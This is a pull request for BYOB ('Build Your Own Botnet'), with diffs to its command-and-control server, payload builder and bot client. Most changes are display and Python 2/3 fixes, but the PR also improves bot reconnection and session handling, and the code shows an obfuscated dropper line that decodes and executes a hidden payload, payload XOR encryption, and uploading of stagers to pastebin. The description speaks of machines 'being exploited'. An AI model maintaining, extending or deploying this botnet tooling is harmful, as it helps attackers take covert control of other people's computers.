### PR TITLE
Triage client / server session handling

### DIFF
--- a/byob/client.py
+++ b/byob/client.py
@@ -197,9 +197,9 @@ def _update(input, output, task=None):
     util.display("({:,} bytes {} to {:,} bytes ({}% {})".format(len(input), 'increased' if len(output) > len(input) else 'reduced', len(output), diff, 'larger' if len(output) > len(input) else 'smaller').ljust(80), style='dim', color='reset')
 
 def _modules(options, **kwargs):
-    util.display("\n[>]", color='green', style='bright', end=',')
+    util.display("\n[>]", color='green', style='bright', end=' ')
     util.display('Modules', color='reset', style='bright')
-    util.display("\tAdding modules... ", color='reset', style='normal', end=',')
+    util.display("\tAdding modules... ", color='reset', style='normal', end=' ')
 
     global __load__
     __load__ = threading.Event()
@@ -224,12 +224,12 @@ def _modules(options, **kwargs):
     return modules
 
 def _imports(options, **kwargs):
-    util.display("\n[>]", color='green', style='bright', end=',')
+    util.display("\n[>]", color='green', style='bright', end=' ')
     util.display("Imports", color='reset', style='bright')
 
     assert 'modules' in kwargs, "missing keyword argument 'modules'"
 
-    util.display("\tAdding imports...", color='reset', style='normal', end=',')
+    util.display("\tAdding imports...", color='reset', style='normal', end=' ')
 
     global __load__
     globals()['__load__'] = threading.Event()
@@ -275,7 +275,7 @@ def _hidden(options, **kwargs):
     return list(hidden)
 
 def _payload(options, **kwargs):
-    util.display("\n[>]", color='green', style='bright', end=',')
+    util.display("\n[>]", color='green', style='bright', end=' ')
     util.display("Payload", color='reset', style='bright')
 
     assert 'var' in kwargs, "missing keyword argument 'var'"
@@ -293,7 +293,7 @@ def _payload(options, **kwargs):
             util.log("Permission denied: unabled to make directory './modules/payloads/'")
 
     if options.compress:
-        util.display("\tCompressing payload... ", color='reset', style='normal', end=',')
+        util.display("\tCompressing payload... ", color='reset', style='normal', end=' ')
         __load__ = threading.Event()
         __spin__ = _spinner(__load__)
         output = generators.compress(payload)
@@ -303,7 +303,7 @@ def _payload(options, **kwargs):
 
     if options.encrypt:
         assert 'key' in kwargs, "missing keyword argument 'key' required for option 'encrypt'"
-        util.display("\tEncrypting payload... ".format(kwargs['key']), color='reset', style='normal', end=',')
+        util.display("\tEncrypting payload... ".format(kwargs['key']), color='reset', style='normal', end=' ')
         __load__ = threading.Event()
         __spin__ = _spinner(__load__)
         output = security.encrypt_xor(payload, base64.b64decode(kwargs['key']))
@@ -311,7 +311,7 @@ def _payload(options, **kwargs):
         _update(payload, output, task='Encryption')
         payload = output
 
-    util.display("\tUploading payload... ", color='reset', style='normal', end=',')
+    util.display("\tUploading payload... ", color='reset', style='normal', end=' ')
 
     __load__ = threading.Event()
     __spin__ = _spinner(__load__)
@@ -340,7 +340,7 @@ def _payload(options, **kwargs):
     return url
 
 def _stager(options, **kwargs):
-    util.display("\n[>]", color='green', style='bright', end=',')
+    util.display("\n[>]", color='green', style='bright', end=' ')
     util.display("Stager", color='reset', style='bright')
 
     assert 'url' in kwargs, "missing keyword argument 'url'"
@@ -359,7 +359,7 @@ def _stager(options, **kwargs):
             util.log("Permission denied: unable to make directory './modules/stagers/'")
 
     if options.compress:
-        util.display("\tCompressing stager... ", color='reset', style='normal', end=',')
+        util.display("\tCompressing stager... ", color='reset', style='normal', end=' ')
         __load__ = threading.Event()
         __spin__ = _spinner(__load__)
         output = generators.compress(stager)
@@ -367,7 +367,7 @@ def _stager(options, **kwargs):
         _update(stager, output, task='Compression')
         stager = output
 
-    util.display("\tUploading stager... ", color='reset', style='normal', end=',')
+    util.display("\tUploading stager... ", color='reset', style='normal', end=' ')
     __load__ = threading.Event()
     __spin__ = _spinner(__load__)
 
@@ -395,9 +395,9 @@ def _stager(options, **kwargs):
     return url
 
 def _dropper(options, **kwargs):
-    util.display("\n[>]", color='green', style='bright', end=',')
+    util.display("\n[>]", color='green', style='bright', end=' ')
     util.display("Dropper", color='reset', style='bright')
-    util.display('\tWriting dropper... ', color='reset', style='normal', end=',')
+    util.display('\tWriting dropper... ', color='reset', style='normal', end=' ')
 
     assert 'url' in kwargs, "missing keyword argument 'url'"
     assert 'var' in kwargs, "missing keyword argument 'var'"
@@ -416,7 +416,7 @@ exec(eval(marshal.loads(zlib.decompress(base64.b64decode({})))))""".format(repr(
     util.display('({:,} bytes written to {})'.format(len(dropper), name), style='dim', color='reset')
 
     if options.freeze:
-        util.display('\tCompiling executable...\n', color='reset', style='normal', end=',')
+        util.display('\tCompiling executable...\n', color='reset', style='normal', end=' ')
         name = generators.freeze(name, icon=options.icon, hidden=kwargs['hidden'])
         util.display('({:,} bytes saved to file: {})\n'.format(len(open(name, 'rb').read()), name))
     return name

--- a/byob/core/database.py
+++ b/byob/core/database.py
@@ -85,31 +85,31 @@ COMMIT;
                         j = json.loads(v.encode())
                         self._display(j, indent+2)
                     except:
-                        util.display(str(k).encode().ljust(4  * indent).center(5 * indent), color=c, style='bright', end=',')
-                        util.display(str(v).encode().replace('\n',' ')[:40], color=c, style='dim')
+                        util.display(str(k).ljust(4  * indent).center(5 * indent).encode(), color=c, style='bright', end=' ')
+                        util.display(str(v).replace('\n',' ')[:40].encode(), color=c, style='dim')
 
                 elif isinstance(v, list):
                     for i in v:
                         if isinstance(v, dict):
-                            util.display(str(k).ljust(4  * indent).center(5 * indent))
+                            util.display(str(k).ljust(4  * indent).center(5 * indent).encode())
                             self._display(v, indent+2)
                         else:
-                            util.display(str(i).ljust(4  * indent).center(5 * indent))
+                            util.display(str(i).ljust(4  * indent).center(5 * indent).encode())
 
                 elif isinstance(v, dict):
-                    util.display(str(k).ljust(4  * indent).center(5 * indent))
+                    util.display(str(k).ljust(4  * indent).center(5 * indent).encode())
                     self._display(v, indent+1)
 
                 elif isinstance(v, int):
                     if v in (0,1):
-                        util.display(str(k).encode().ljust(4  * indent).center(5 * indent), color=c, style='bright', end=',')
+                        util.display(str(k).ljust(4  * indent).center(5 * indent).encode(), color=c, style='bright', end=' ')
                         util.display(str(bool(v)).encode(), color=c, style='dim')
                     else:
-                        util.display(str(k).encode().ljust(4  * indent).center(5 * indent), color=c, style='bright', end=',')
+                        util.display(str(k).ljust(4  * indent).center(5 * indent).encode(), color=c, style='bright', end=' ')
                         util.display(str(v).encode(), color=c, style='dim')
 
                 else:
-                    util.display(str(k).encode().ljust(4  * indent).center(5 * indent), color=c, style='bright', end=',')
+                    util.display(str(k).ljust(4  * indent).center(5 * indent).encode(), color=c, style='bright', end=' ')
                     util.display(str(v).encode(), color=c, style='dim')
 
         elif isinstance(data, list):
@@ -117,7 +117,7 @@ COMMIT;
                 if isinstance(row, dict):
                     self._display(row, indent+2)
                 else:
-                    util.display(str(row).encode().ljust(4  * indent).center(5 * indent), color=c, style='bright', end=',')
+                    util.display(str(row).ljust(4  * indent).center(5 * indent).encode(), color=c, style='bright', end=' ')
                     util.display(str(v).encode(), color=c, style='dim')
         else:
             try:
@@ -129,11 +129,11 @@ COMMIT;
 
             if isinstance(data, dict):
                 i = data.pop('id',None)
-                util.display(str(i).rjust(indent-1), color='reset', style='bright') if i else None
+                util.display(str(i).rjust(indent-1).encode(), color='reset', style='bright') if i else None
                 self._display(data, indent+2)
             else:
-                util.display(data.encode().ljust(4  * indent).center(5 * indent), color=c, style='bright', end=',')
-                util.display(v.encode(), color=c, style='dim')
+                util.display(data.ljust(4  * indent).center(5 * indent).encode(), color=c, style='bright', end=' ')
+                util.display(str(v).encode(), color=c, style='dim')
 
     def _client_sessions(self, uid):
         for i in self.execute('select sessions from tbl_sessions where uid=:uid', {"uid": uid}):
@@ -201,7 +201,7 @@ COMMIT;
         sql = "select * from tbl_sessions" if verbose else "select id, public_ip, uid, platform from tbl_sessions"
         statement = self.execute(sql)
         columns = [_[0] for _ in statement.description]
-        return [{k:v for k,v in zip(columns, rows)} for rows in statement.fetchall()]
+        return [{k:v for (k,v) in zip(columns, rows)} for rows in statement.fetchall()]
 
     def get_tasks(self):
         """

--- a/byob/core/payloads.py
+++ b/byob/core/payloads.py
@@ -1077,10 +1077,13 @@ class Payload():
         try:
             hdr_len = struct.calcsize('!L')
             hdr = self.connection.recv(hdr_len)
-            msg_len = struct.unpack('!L', hdr)[0]
-            msg = self.connection.recv(msg_len)
-            data = globals()['decrypt_aes'](msg, self.key)
-            return json.loads(data)
+            if len(hdr) == 4:
+                msg_len = struct.unpack('!L', hdr)[0]
+                msg = self.connection.recv(msg_len)
+                data = globals()['decrypt_aes'](msg, self.key)
+                return json.loads(data)
+            else:
+                log("{} error: invalid header length".format(self.recv_task.__name__))
         except Exception as e:
             log("{} error: {}".format(self.recv_task.__name__, str(e)))
 

--- a/byob/core/util.py
+++ b/byob/core/util.py
@@ -444,7 +444,9 @@ def pastebin(source, api_key):
     if sys.version_info[0] > 2:
         from urllib.parse import urlsplit,urlunsplit
     else:
-        from urllib2 import urlsplit,urlunsplit
+        from urllib2 import urlparse
+        urlsplit = urlparse.urlsplit
+        urlunsplit = urlparse.urlunsplit
     if isinstance(api_key, str):
         try:
             info = {'api_option': 'paste', 'api_paste_code': normalize(source), 'api_dev_key': api_key}

--- a/byob/core/util.py
+++ b/byob/core/util.py
@@ -1,7 +1,7 @@
 #!/usr/bin/python
 # -*- coding: utf-8 -*-
 'Utilities (Build Your Own Botnet)'
-
+from __future__ import print_function
 _debug = False
 
 # main
@@ -72,7 +72,7 @@ def public_ip():
     if sys.version_info[0] > 2:
         from urllib.request import urlopen
     else:
-        from urllib import urlopen
+        from urllib2 import urlopen
     return urlopen('http://api.ipify.org').read()
 
 def local_ip():
@@ -376,7 +376,7 @@ def powershell(code):
     except Exception as e:
         log("{} error: {}".format(powershell.__name__, str(e)))
 
-def display(output, color=None, style=None, end='\n', event=None, lock=None):
+def display(output, color=None, style=None, end='\\n', event=None, lock=None):
     """
     Display output in the console
 
@@ -393,14 +393,17 @@ def display(output, color=None, style=None, end='\n', event=None, lock=None):
     """
     import colorama
     colorama.init()
-    output = str(output)
+    if isinstance(output, bytes):
+        output = output.decode('utf-8')
+    else:
+        output = str(output)
     _color = ''
     if color:
         _color = getattr(colorama.Fore, color.upper())
     _style = ''
     if style:
         _style = getattr(colorama.Style, style.upper())
-    exec("print(_color + _style + output){}".format(end))
+    exec("""print(_color + _style + output + colorama.Style.RESET_ALL, end="{}")""".format(end))
 
 def color():
     """

--- a/byob/modules/util.py
+++ b/byob/modules/util.py
@@ -393,14 +393,17 @@ def display(output, color=None, style=None, end='\n', event=None, lock=None):
     """
     import colorama
     colorama.init()
-    output = str(output)
+    if isinstance(output, bytes):
+        output = output.decode('utf-8')
+    else:
+        output = str(output)
     _color = ''
     if color:
         _color = getattr(colorama.Fore, color.upper())
     _style = ''
     if style:
         _style = getattr(colorama.Style, style.upper())
-    exec("print(_color + _style + output){}".format(end))
+    exec("""print(_color + _style + output + colorama.Style.RESET_ALL, end="{}")""".format(end))
 
 def color():
     """
@@ -441,7 +444,9 @@ def pastebin(source, api_key):
     if sys.version_info[0] > 2:
         from urllib.parse import urlsplit,urlunsplit
     else:
-        from urllib2 import urlsplit,urlunsplit
+        from urllib2 import urlparse
+        urlsplit = urlparse.urlsplit
+        urlunsplit = urlparse.urlunsplit
     if isinstance(api_key, str):
         try:
             info = {'api_option': 'paste', 'api_paste_code': normalize(source), 'api_dev_key': api_key}

--- a/byob/server.py
+++ b/byob/server.py
@@ -286,11 +286,11 @@ class C2():
                             if len(str(info.get(key))) > 80:
                                 info[key] = str(info.get(key))[:77] + '...'
                             info[key] = str(info.get(key)).replace('\n',' ') if not isinstance(info.get(key), datetime.datetime) else str(key).encode().replace("'", '"').replace('True','true').replace('False','false') if not isinstance(key, datetime.datetime) else str(int(time.mktime(key.timetuple())))
-                            util.display('\x20' * 4, end=',')
+                            util.display('\x20' * 4, end=' ')
                             util.display(key.ljust(max_key).center(max_key + 2) + info[key].ljust(max_val).center(max_val + 2), color=self._text_color, style=self._text_style)
         else:
             with lock:
-                util.display('\x20' * 4, end=',')
+                util.display('\x20' * 4, end=' ')
                 util.display(str(info), color=self._text_color, style=self._text_style)
 
     def _socket(self, port):
@@ -305,12 +305,12 @@ class C2():
         with lock:
             if data:
                 util.display('\n{}\n'.format(data))
-            util.display(prompt, end=',')
+            util.display(prompt, end=' ')
 
     def _banner(self):
         with self._lock:
             util.display(__banner__, color=random.choice(['red','green','cyan','magenta','yellow']), style='bright')
-            util.display("[?] ", color='yellow', style='bright', end=',')
+            util.display("[?] ", color='yellow', style='bright', end=' ')
             util.display("Hint: show usage information with the 'help' command\n", color='white', style='normal')
         return __banner__
 
@@ -403,11 +403,11 @@ class C2():
         info = json.loads(info) if info else {command['usage']: command['description'] for command in self.commands.values()}
         max_key = max(map(len, list(info.keys()) + [column1])) + 2
         max_val = max(map(len, list(info.values()) + [column2])) + 2
-        util.display('\n', end=',')
+        util.display('\n', end=' ')
         util.display(column1.center(max_key) + column2.center(max_val), color=self._text_color, style='bright')
         for key in sorted(info):
             util.display(key.ljust(max_key).center(max_key + 2) + info[key].ljust(max_val).center(max_val + 2), color=self._text_color, style=self._text_style)
-        util.display("\n", end=',')
+        util.display("\n", end=' ')
 
     def display(self, info):
         """
@@ -432,8 +432,13 @@ class C2():
                     self._print(json.loads(info))
                 except:
                     util.display(str(info), color=self._text_color, style=self._text_style)
+            elif isinstance(info, bytes):
+                try:
+                    self._print(json.load(info))
+                except:
+                    util.display(info.decode('utf-8'), color=self._text_color, style=self._text_style)
             else:
-                util.log("{} error: invalid data type '{}'".format(self.display.func_name, type(info)))
+                util.log("{} error: invalid data type '{}'".format(self.display.__name__, type(info)))
             print()
 
     def query(self, statement):
@@ -456,11 +461,11 @@ class C2():
         prompt_color = [color for color in filter(str.isupper, dir(colorama.Fore)) if color == self._prompt_color][0]
         prompt_style = [style for style in filter(str.isupper, dir(colorama.Style)) if style == self._prompt_style][0]
         util.display('\n\t    OPTIONS', color='white', style='bright')
-        util.display('text color/style: ', color='white', style='normal', end=',')
+        util.display('text color/style: ', color='white', style='normal', end=' ')
         util.display('/'.join((self._text_color.title(), self._text_style.title())), color=self._text_color, style=self._text_style)
-        util.display('prompt color/style: ', color='white', style='normal', end=',')
+        util.display('prompt color/style: ', color='white', style='normal', end=' ')
         util.display('/'.join((self._prompt_color.title(), self._prompt_style.title())), color=self._prompt_color, style=self._prompt_style)
-        util.display('debug: ', color='white', style='normal', end=',')
+        util.display('debug: ', color='white', style='normal', end=' ')
         util.display('True\n' if globals()['debug'] else 'False\n', color='green' if globals()['debug'] else 'red', style='normal')
 
     def set(self, args=None):
@@ -495,7 +500,7 @@ class C2():
                             globals()['debug'] = False
                         elif setting.lower() in ('1','on','true','enable'):
                             globals()['debug'] = True
-                        util.display("\n[+]" if globals()['debug'] else "\n[-]", color='green' if globals()['debug'] else 'red', style='normal', end=',')
+                        util.display("\n[+]" if globals()['debug'] else "\n[-]", color='green' if globals()['debug'] else 'red', style='normal', end=' ')
                         util.display("Debug: {}\n".format("ON" if globals()['debug'] else "OFF"), color='white', style='bright')
                         return
                 for setting, option in arguments.kwargs.items():
@@ -507,7 +512,7 @@ class C2():
                         elif setting == 'style':
                             if hasattr(colorama.Style, option):
                                 self._prompt_style = option
-                        util.display("\nprompt color/style changed to ", color='white', style='bright', end=',')
+                        util.display("\nprompt color/style changed to ", color='white', style='bright', end=' ')
                         util.display(option + '\n', color=self._prompt_color, style=self._prompt_style)
                         return
                     elif target == 'text':
@@ -517,7 +522,7 @@ class C2():
                         elif setting == 'style':
                             if hasattr(colorama.Style, option):
                                 self._text_style = option
-                        util.display("\ntext color/style changed to ", color='white', style='bright', end=',')
+                        util.display("\ntext color/style changed to ", color='white', style='bright', end=' ')
                         util.display(option + '\n', color=self._text_color, style=self._text_style)
                         return
         util.display("\nusage: set [setting] [option]=[value]\n\n    colors:   white/black/red/yellow/green/cyan/magenta\n    styles:   dim/normal/bright\n", color=self._text_color, style=self._text_style)
@@ -764,27 +769,27 @@ class C2():
                 info = self.database.handle_session(session.info)
                 if isinstance(info, dict):
                     if info.pop('new', False):
-                        util.display("\n\n[+]", color='green', style='bright', end=',')
-                        util.display("New Connection:", color='white', style='bright', end=',')
+                        util.display("\n\n[+]", color='green', style='bright', end=' ')
+                        util.display("New Connection:", color='white', style='bright', end=' ')
                         util.display(address[0], color='white', style='normal')
-                        util.display("    Session:", color='white', style='bright', end=',')
+                        util.display("    Session:", color='white', style='bright', end=' ')
                         util.display(str(session.id), color='white', style='normal')
-                        util.display("    Started:", color='white', style='bright', end=',')
+                        util.display("    Started:", color='white', style='bright', end=' ')
                         util.display(time.ctime(session._created), color='white', style='normal')
                         self._count += 1
                     else:
-                        util.display("\n\n[+]", color='green', style='bright', end=',')
-                        util.display("{} reconnected".format(address[0]), color='white', style='bright', end=',')
+                        util.display("\n\n[+]", color='green', style='bright', end=' ')
+                        util.display("{} reconnected".format(address[0]), color='white', style='bright', end=' ')
                     session.info = info
                     self.sessions[int(session.id)] = session
             else:
-                util.display("\n\n[-]", color='red', style='bright', end=',')
-                util.display("Failed Connection:", color='white', style='bright', end=',')
+                util.display("\n\n[-]", color='red', style='bright', end=' ')
+                util.display("Failed Connection:", color='white', style='bright', end=' ')
                 util.display(address[0], color='white', style='normal')
 
             # refresh prompt
             prompt = '\n{}'.format(self.current_session._prompt if self.current_session else self._prompt)
-            util.display(prompt, color=self._prompt_color, style=self._prompt_style, end=',')
+            util.display(prompt, color=self._prompt_color, style=self._prompt_style, end=' ')
             sys.stdout.flush()
 
             abort = globals()['__abort']

--- a/byob/server.py
+++ b/byob/server.py
@@ -762,6 +762,7 @@ class C2():
             self.database.update_status(session.get('uid'), 0)
             session['online'] = False
             self.sessions[session.get('id')] = { "info": session, "connection": None }
+            self._count += 1
         while True:
             connection, address = self.socket.accept()
             session = Session(connection=connection, id=self._count)
@@ -908,8 +909,8 @@ class Session(threading.Thread):
         msg = self.connection.recv(msg_size)
         data = security.decrypt_aes(msg, self.key)
         info = json.loads(data)
-        for item in [item for item in info if info[item].startswith("_b64")]:
-            info[item] = base64.decodebytes(info[item].decode('ascii'))
+        for item in [item for item in info if "_b64" in str(info[item])[0:5]]:
+            info[item] = base64.b64decode(bytes(info[item][6:])).decode('ascii')
         return info
 
     def status(self):


### PR DESCRIPTION
* Fixes issue #126 
* Fixes issue #123 
* Fixed (original) issue #110 
* Fixed issue #74 
See commit notes

```
* Enabled passive flags
* Updated socket error handlings
* Updated socket passive method
* Updated bot disconnect handling
* Fixed/Improved passive method
* Fixed/Improved bot session reestablish

Notes:

  Bot disconnect handling accounts for just a few expected failure
    methods and assume graceful socket closures are a kill message.

  Windows socket errors were added as anticipated, but this may
    need to be expanded for more accurate consideration

  Bot passive activity in failure event is now much more stable.
    This is working relatively well across both v2 and v3, and
    even while running separate versions on either side.

Outstanding Issues:

  Generating payloads from client.py REQUIRES you use the version
    of python present on the machine BEING EXPLOITED. Why you say?
    Well, some issue with the marshal format, apparently, and I
    am not focusing on that fix in this PR.
```